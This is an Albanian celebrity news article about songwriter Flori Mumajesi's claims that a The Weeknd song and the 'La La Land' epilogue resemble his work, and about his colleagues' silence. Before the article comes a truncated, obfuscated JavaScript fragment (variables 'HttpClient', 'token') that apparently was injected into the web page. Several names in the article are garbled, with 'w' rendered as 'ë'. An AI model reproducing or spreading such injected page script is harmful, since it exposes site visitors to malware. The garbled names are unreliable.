;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kolegët në ‘silent mode’ për Flori Mumajesin?!

By

Pak javë më parë, kantautori Flori Mumajesi befasoi me një postim në rrjete sociale.

Ai ilustronte qartazi ngjajshmërinë e këngës ‘Six Under Feet’ të The Ëeeknd me ‘Nallane’ të publikuar gati dy vite më parë.

Por, ky zhvillim nuk ishte i vetmi në serinë e ngjajshmërisë së qëllimshme apo të rastësishme që ndërlidhen me krijimtarinë e një prej muzicientëve më të mirë të muzikës moderne shqipe.

Vetëm dy ditë më herët, Flori vuri në pah një tjetër ngjajshmëri, kësaj rradhe të një pjese të kolonës zanore tëk filmi që po thyen rekorde ‘La la land’.

Melodia e ‘La la land epilogue’ e James Hurëitz është pothuajse identike me këngën ‘Me fjalë të vogla’.

Kur është fjala tek projektet, një ‘armatë’ kolegësh në estradën shqiptare tashmë e kanë shndërruar në traditë përkrahjen por e njejta nuk ka ardhur në këtë rast.

Këngëtarët e tjerë të skenës kanë qëndruar në gjendje të heshtur mbi këto dy zhvillime të paprecedenta.

I vetmi që ka reaguar është shkrimtari Albatros Rexhaj i cili në një shkrim të gjatë shtjellon mundësinë e rastësisë apo inspirimit duke vënë theksin tek një problem.

‘Ajo që është e rëndësishme është se Flori Mumajesit duhet t’i njihet autorësia burimore për këtë melodi, ndërkaq ne, së paku artistët shqiptarë, duhet t’i shprehim mirënjohjen dhe respektin tonë për faktin që nga shpirti i tij krijues kanë dal tinguj kaq të ndjerë.

Nuk pres gjë nga shteti shqiptar që do të angazhohet por jam i zhgënjyer me mungesën e solidaritetit nga artistët e tjerë, por edhe nga media jonë që mezi nuk pret të merret me budallallëqe të gjithfarë llojit, ndërkaq tani, pos një raportimi minor, hesht.

Edhe në një situatë të tillë, që do të duhej të ishte çast krenarie për të gjithë ne, artistë e gazetarë, fshihemi pas maskave tona të shpifura të xhelozisë dhe smirës‘ – deklaron Rexhaj.

Ky shkrim mes tjerash e ka gëzuar edhe vetë Florin i cili ka shfrytëzuar këtë moment si pikë reflektimi duke pyetur: ‘E meritoj?!’

Me apo pa përkrahjen e medias e kolegëve, një gjë është e sigurt dhe mund të thuhet, kësaj rradhe me fjalë të MËDHA. Muzika shqiptare është me fat që ka Florin në një krijimtari kolosale që do vazhdojë t’i mbijetojë kohës duke u shtrirë kudo ku flitet shqip, e tashmë jo vetëm! /Prive.al/

Artikuj të ngjashëm